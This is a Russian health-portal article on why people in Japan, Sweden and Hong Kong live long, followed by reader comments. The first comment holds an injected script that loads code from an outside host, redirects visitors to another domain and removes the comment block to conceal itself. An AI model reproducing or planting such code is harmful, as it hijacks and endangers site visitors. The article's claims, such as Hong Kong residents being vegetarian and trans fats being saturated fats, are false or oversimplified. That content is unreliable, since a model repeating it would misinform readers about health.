Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Народы-долгожители. Почем...  >>  Народы-долгожители. Почему они живут долго
 
Обратная связь
 

Народы-долгожители. Почему они живут долго

Размер шрифта
03 февраля 2012 08:00
  • google_analytics: false
  • Нравится

Япония, Швеция и Гонконг. Жители этих стран отличаются исключительной продолжительностью жизни. В чем же причина?

1

Япония. Средняя продолжительность жизни 81 год.

У японцев средняя продолжительность жизни 81 год. Одна из главных причин долголетия японцев – активный образ жизни. Они много ходят ежедневно. При ходьбе активно сокращается сердце, кровоснабжение усиливается, а сосуды расширяются. Кровь в сосудах не застаивается, следовательно, застоя не происходит. Ноги – это «второе сердце».

Если человек мало ходит, у него падает уровень кровообращения, и образуются сгустки и застои крови, которые приводят к тромбозу. Так как кровь движется от нижних конечностей к сердцу и далее поступает в легкие для насыщения кислородом, то вместе с потоком крови могут двигаться и тромбы. Попадая в легочную артерию, они вызывают ее закупорку и нарушение дальнейшего кровотока по этой артерии, что ведет к развитию сердечной недостаточности.

1

Швеция. Средняя продолжительность жизни 80 лет.

У шведов средняя продолжительность жизни 80 лет, потому что в этой стране самый низкий уровень курящих людей. А курение является одним из факторов образования атеросклеротических бляшек. Когда бляшки перекрывают кровоток, возникает инсульт и инфаркт миокарда.

Изначально сосуд мягкий и ровный. Если человек курит, никотин повреждает стенки сосуда. На них образуются маленькие трещинки, в которые попадает холестерин. Так начинает формироваться атеросклеротическая бляшка. Со временем она становится все больше и может совсем перекрыть кровоток в сосуде и привести к инфаркту миокарда.

Гонконг. Средняя продолжительность жизни 82 года.

Жители Гонконга практически не едят красного мяса и являются вегетарианцами.

Красное мясо содержит транс-жиры (насыщенные жиры), которые повышают риск сердечных заболеваний, понижают уровень омега-3 жирной кислоты в организме, повышают уровень холестерина. От большого количества красного мяса повышается риск заболевания раком.

В России средняя продолжительность жизни гораздо меньше. Речь идет о десятках лет, которые люди упускают из-за курения, недостатка двигательной активности и неправильного рациона.


 

Сюжеты по теме:
Народы-долгожители. Почему они живут долго

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - izabella333

12 апреля 2016 в 09:52

Цитировать   |   Пожаловаться

интересно

Статьи

       
Сколько калорий нужно не съесть, чтобы остаться молодой?   Лысые крысы спасут вас от старости!   Если хотите пережить рак – женитесь!   Почему женщины живут дольше мужчин?  
27 марта 2012Моцарт влияет на продолжительность жизни 24 февраля 2012Найден белок, продлевающий жизнь
 
22 февраля 2012Депрессия ускоряет процесс старения 02 ноября 2011Счастье продлевает жизнь
 

Слайдшоу

Как прожить вечность

Тесты

Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.